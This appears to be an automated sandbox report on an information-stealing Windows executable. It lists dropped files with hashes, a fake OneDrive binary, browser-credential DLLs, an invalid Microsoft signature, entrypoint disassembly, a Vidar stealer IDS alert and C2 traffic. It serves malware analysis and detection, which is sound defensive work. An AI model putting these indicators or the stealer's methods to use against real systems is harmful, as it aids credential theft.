Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............\|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.\|..).?.H.'.\|....).?m.....h.t......\|4.%...d....

C:\ProgramData\4YYGUQ5HBW956C5CCOF\files\temp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6341088
Entropy (8bit):	6.068894087132248
Encrypted:	false
SSDEEP:	196608:UOcdACR6ND0XGaOaYhY+4xBcdPErdVkIGKCy5AiGsQGtxU:UOcdACR6cM4xBcirdUy5Aiop
MD5:	4A9ABB3B18F7EFB17C10DF19AE459B17
SHA1:	EB97904EA7C60DB501B3C9FF06B419FA08AA3C15
SHA-256:	6BD6FC5EC84D03B6650041D162F85DB801B9C3C503CF1CC7272E5A2A4AC1B560
SHA-512:	18A33558BA5EBB3ADF591A792E727EAFE038C172CF110E43B13397CC52613E31D49CB9D16FF47C6209475F28160935BB80A4757625F739091D63A22C6BA54DD9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 61%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......cL0.'-^.'-^.'-^.3F].)-^.3F[..-^.3FZ.1-^.uXZ.6-^.uX].3-^.uX[.m-^.3F_."-^.'-_.{-^..XW.&-^..X\.&-^.Rich'-^.................PE..L........................R^..@......X........p^...@...........................`...........@.................................h\`.<.....................`..9....`.H-...:`.............................8:`.@............p^.H...........................5txNt....g.......h................S. ..`XvtVrHf...[.......[..l..........6... ..`gUflta.......p^......V^.....r...7...@..@Ysaja........p`......J`.........T.+.@...5Yuqoc..H-....`......Z`.........)...@..B................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	334288
Entropy (8bit):	6.807000203861606
Encrypted:	false
SSDEEP:	6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
MD5:	EF2834AC4EE7D6724F255BEAF527E635
SHA1:	5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
SHA-256:	A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
SHA-512:	C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....b.[.........."!.........f......)........................................p.......s....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	137168
Entropy (8bit):	6.78390291752429
Encrypted:	false
SSDEEP:	3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
MD5:	8F73C08A9660691143661BF7332C3C27
SHA1:	37FA65DD737C50FDA710FDBDE89E51374D0C204A
SHA-256:	3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
SHA-512:	0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 6%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...._.[.........."!.....z...................................................@.......3....@A........................@...t.......,.... ..x....................0..h.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1246160
Entropy (8bit):	6.765536416094505
Encrypted:	false
SSDEEP:	24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
MD5:	BFAC4E3C5908856BA17D41EDCD455A51
SHA1:	8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
SHA-256:	E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
SHA-512:	2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L....b.[.........."!................w........................................@............@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144848
Entropy (8bit):	6.539750563864442
Encrypted:	false
SSDEEP:	3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
MD5:	A2EE53DE9167BF0D6C019303B7CA84E5
SHA1:	2A3C737FA1157E8483815E98B666408A18C0DB42
SHA-256:	43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
SHA-512:	45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....b.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\0boUgmEouuadut_s

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	Non-ISO extended-ASCII text, with NEL line terminators
Category:	dropped
Size (bytes):	223
Entropy (8bit):	6.170451201507629
Encrypted:	false
SSDEEP:	6:YggHY6/avBQ+b2cSQZCxd2gdU/tU+NFtW6N:Yf4649bWQZC79N+04
MD5:	FD9CF5987B936C8CAC5E2A057BDDE6A4
SHA1:	6B46D0169F9CDC9E069A257212A65074093926E6
SHA-256:	BCF4EF0EA457DC1EDD493A34B87B49B5FD14D889BD2129CFE870572992143419
SHA-512:	B74F44AFB5F1E6E7D79D25CD72A7397BCC6999910124F014604950ECEA8B30D55452A441216A469845561ACB9A3E774C9802FEFFED267365E4FC0A5EA3953495
Malicious:	false
Reputation:	unknown
Preview:	.............................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	180120
Entropy (8bit):	5.416376176720327
Encrypted:	false
SSDEEP:	3072:I/D8SxgtONJf2IoY3UJMYZIP1kZZP7n+H:lSxgELf2ItUJM2ZD+
MD5:	F3AF73070387FB75B19286826CC3126C
SHA1:	7774854137D7ADA89F3B4BDF67631456A1E74853
SHA-256:	974243F2487CEEB8EEEA6AA8FEE215F15C7B204382D4BD12F469F712F56C3610
SHA-512:	A620583B2D89E3F0350AE4D5DFE2B2C160D2F982B29DEA6B8E273BB39AB2D1D91A2452238E9C30CDD7151AA555E231E1AC9930F9D76F6FF80504EACB25FA557A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Metadefender, Detection: 11%, Browse Antivirus: ReversingLabs, Detection: 62%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!..e...e...e......`............o.......B.......u.......l......f...e...<.......d.......d...e...d.......d...Riche...........PE..d.....bb..........".................l..........@..........................................`..................................................k..(.......8................%......T....W...............................W..8...............H............................text...@........................... ..`.rdata..f...........................@..@.data................d..............@....pdata...............p..............@..@_RDATA..............................@..@.rsrc...8...........................@..@.reloc..T...........................@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneDrive\Secur32.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	324096
Entropy (8bit):	5.699237249614132
Encrypted:	false
SSDEEP:	6144:dJ44tdGSdC73ucShSi5ARPL4emfJFD+Tx:dW7EekJ
MD5:	FED6517A5F84EECC29EDEE5586D7FEEB
SHA1:	56DF244BF73C7EC7B59C98E1F5D47B379B58A06B
SHA-256:	5075A0587B1B35C0152D8C44468641D0AB1C52FD8F1814EE257ECEB9FFCB89B6
SHA-512:	45CAB4395D509B5D7DFB904E84D5A679440412F494C4970191B5882572F4D1B9C9CD28D41A49619353C405C2477153B4A7A1568FCF307709DF0B81B38C405642
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*[.]n:..n:..n:..gB..z:...M..z:...M..f:...M..j:...M..h:...H..k:..n:..0:...M..j:...M..o:...Mx.o:...M..o:..Richn:..........PE..d...1.db.........." .....(..........`........................................@............`.........................................P...P.......,.... ...........;...........0..........................................8............@...............................text...%'.......(.................. ..`.rdata..R....@.......,..............@..@.data... ...........................@....pdata...;.......<..................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\sendMessage[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	169
Entropy (8bit):	4.51833957423091
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLPfLRIwcWWGu:q43tISl6kXiMIWSU6XlI5LPtIpfGu
MD5:	84855C13836B389D5EC7CFD4C9266173
SHA1:	1CF3056FF23C4176FD7CA9816A000ED461D6D323
SHA-256:	502083C916AE481CDD413B8D93315300653DF5FB3DCC5770C01991DE19977EAE
SHA-512:	2479112004884D42D4FFE1174DC358C5D1B0FA2B41641D32F2FB67539C4F834D63CFBBF7E98C63B9A64E49B26390C410BB7E50F1AD4A755F32D081367AF05FCB
Malicious:	false
Reputation:	unknown
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.18.0</center>..</body>..</html>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Software[2].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6341088
Entropy (8bit):	6.068894087132248
Encrypted:	false
SSDEEP:	196608:UOcdACR6ND0XGaOaYhY+4xBcdPErdVkIGKCy5AiGsQGtxU:UOcdACR6cM4xBcirdUy5Aiop
MD5:	4A9ABB3B18F7EFB17C10DF19AE459B17
SHA1:	EB97904EA7C60DB501B3C9FF06B419FA08AA3C15
SHA-256:	6BD6FC5EC84D03B6650041D162F85DB801B9C3C503CF1CC7272E5A2A4AC1B560
SHA-512:	18A33558BA5EBB3ADF591A792E727EAFE038C172CF110E43B13397CC52613E31D49CB9D16FF47C6209475F28160935BB80A4757625F739091D63A22C6BA54DD9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......cL0.'-^.'-^.'-^.3F].)-^.3F[..-^.3FZ.1-^.uXZ.6-^.uX].3-^.uX[.m-^.3F_."-^.'-_.{-^..XW.&-^..X\.&-^.Rich'-^.................PE..L........................R^..@......X........p^...@...........................`...........@.................................h\`.<.....................`..9....`.H-...:`.............................8:`.@............p^.H...........................5txNt....g.......h................S. ..`XvtVrHf...[.......[..l..........6... ..`gUflta.......p^......V^.....r...7...@..@Ysaja........p`......J`.........T.+.@...5Yuqoc..H-....`......Z`.........)...@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\json[1].json

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	UTF-8 Unicode text
Category:	dropped
Size (bytes):	251
Entropy (8bit):	4.885410270288226
Encrypted:	false
SSDEEP:	3:0wMgRea9tupqHHf9hyLMfEtpvHf+LLQvSHCh2HExCRAfYC2fQ8CQcCMyt8q25TvY:0wMgReaPupGhQpff+LLgS1H5a76W35jY
MD5:	04853FB025F47792E52A695F94DB2ADD
SHA1:	1EC59B705DD4EA72D3ED61B93C3E7B9D24963E1A
SHA-256:	4EFE3325F0082FB495CC4F24452B98C5104D2CB62A53FA20581A7301CAF0724F
SHA-512:	502936245269AB91E363BC549C6FF1960B491476FAB755C59E2EFA7723ACCE86AAC53782FD34179D22A19016A4661D342F700444C961EEE2C67DB25C66F0C53A
Malicious:	false
Reputation:	unknown
Preview:	{. "ip": "102.129.143.55",. "city": "H.nenberg",. "region": "Zug",. "country": "CH",. "loc": "47.1754,8.4250",. "org": "AS212238 Datacamp Limited",. "postal": "6331",. "timezone": "Europe/Zurich",. "readme": "https://ipinfo.io/missingauth".}

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	6.0713446156288695
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	MzRn1YNrbz.exe
File size:	2805688
MD5:	ba041a9fc41225152308162ac9073707
SHA1:	2a4622d6e4974d71862b3976309d38d51603052b
SHA256:	0d5bfe99b0e343aa66584a28af6000c39f8b9aacc7f304d13b7e2a8cc31d16eb
SHA512:	a0cc30d54f0ae6d0621a8ff1b55a6e053085e181167f14f9a86a306fb63dea9b66781085a9e3d2b4d810750bc8835e1f080e8c61912611fb7cfaf9df7d9a74b7
SSDEEP:	49152:3WyTwJ2fG+yThQNqBG5GcjvlIDvXZW1Q0WjVX3+RINaHdNnOV1abkRFtPu+mdMmd:3WyTwwfry1LG5GcjvlIDvXZkQ0WhX3+9
TLSH:	39D5D0BF9705D81ECB433475859F92A25002B671690FB5935F847AA9D32B0CEFF22B42
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......cD0.'%^.'%^.'%^.3N].)%^.3N[..%^.3NZ.1%^.uPZ.6%^.uP].3%^.uP[.m%^.3N_."%^.'%_.\|%^..PW.&%^..P\.&%^.Rich'%^.........PE..L...g.}b...

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x40bc68
Entrypoint Section:	s1DXt
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x627D1367 [Thu May 12 14:02:15 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	37a87ba4c777dcd1db50684f6b029f1b

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	9/2/2021 11:33:02 AM 9/1/2022 11:33:02 AM
Subject Chain	CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:	3
Thumbprint MD5:	550C27BE6F1184B6CC93B4B4E2EA9D58
Thumbprint SHA-1:	C9CAEDC2CECF953E812C6446D41927B9864BB880
Thumbprint SHA-256:	63E8D95BCEE4522E6380E7F9305A676C0880AD93AD3BA9CB53FE43D6081A1025
Serial:	3300000255181DA42EE086FC15000000000255

Entrypoint Preview

Instruction
call 00007F7AE0A84C1Ch
jmp 00007F7AE0A84429h
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007F7AE0A845CBh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007F7AE0A845BCh
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007F7AE0A845BEh
add edx, 28h
cmp edx, esi
jne 00007F7AE0A8459Ch
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007F7AE0A845ABh
push esi
call 00007F7AE0A850CFh
test eax, eax
je 00007F7AE0A845D2h
mov eax, dword ptr fs:[00000018h]
mov esi, 006AA1E0h
mov edx, dword ptr [eax+04h]
jmp 00007F7AE0A845B6h
cmp edx, eax
je 00007F7AE0A845C2h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007F7AE0A845A2h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
jne 00007F7AE0A845B9h
mov byte ptr [006AA1E4h], 00000001h
call 00007F7AE0A84EBDh
call 00007F7AE0A86F01h
test al, al
jne 00007F7AE0A845B6h
xor al, al
pop ebp
ret
call 00007F7AE0A8F778h
test al, al
jne 00007F7AE0A845BCh
push 00000000h
call 00007F7AE0A86F08h
pop ecx
jmp 00007F7AE0A8459Bh
mov al, 01h
pop ebp
ret
push ebp
mov ebp, esp
cmp byte ptr [006AA1E5h], 00000000h
je 00007F7AE0A845B6h
mov al, 01h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2a7a68	0x3c	h9kRta
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x2aa800	0x27b8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2ab000	0x2d08	GSiJoc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2a5824	0x1c	h9kRta
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2a5840	0x40	h9kRta
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x289000	0x144	h9kRta
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
s1DXt	0x1000	0x267e5	0x26800	False	0.541732193588	data	6.59510706939	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
xczNltw	0x28000	0x260b01	0x260c00	unknown	unknown	unknown	unknown	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
h9kRta	0x289000	0x1f1be	0x1f200	False	0.375400037651	data	6.15509356662	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
116Za	0x2a9000	0x1d08	0x1000	False	0.1923828125	DOS executable (block device driver\377\377\377\377\261)	3.04873846984	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
GSiJoc	0x2ab000	0x2d08	0x2e00	False	0.778108016304	data	6.68444755589	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

USER32.dll

GetSystemMetrics, GetSysColorBrush, FindWindowA

KERNEL32.dll

GetProcAddress, CreateFileW, HeapSize, GetProcessHeap, GetCurrentThreadId, MultiByteToWideChar, GetLastError, GetCurrentProcessId, GetConsoleWindow, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetStringTypeW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, SetStdHandle, RaiseException, RtlUnwind, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, WriteConsoleW, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
116.202.0.187192.168.2.580497562035911 05/16/22-10:29:37.838204	TCP	2035911	ET TROJAN Vidar/Arkei/Megumin Stealer Keywords Retrieved	80	49756	116.202.0.187	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 16, 2022 10:29:36.708970070 CEST	49753	443	192.168.2.5	149.154.167.99
May 16, 2022 10:29:36.709019899 CEST	443	49753	149.154.167.99	192.168.2.5
May 16, 2022 10:29:36.709315062 CEST	49753	443	192.168.2.5	149.154.167.99
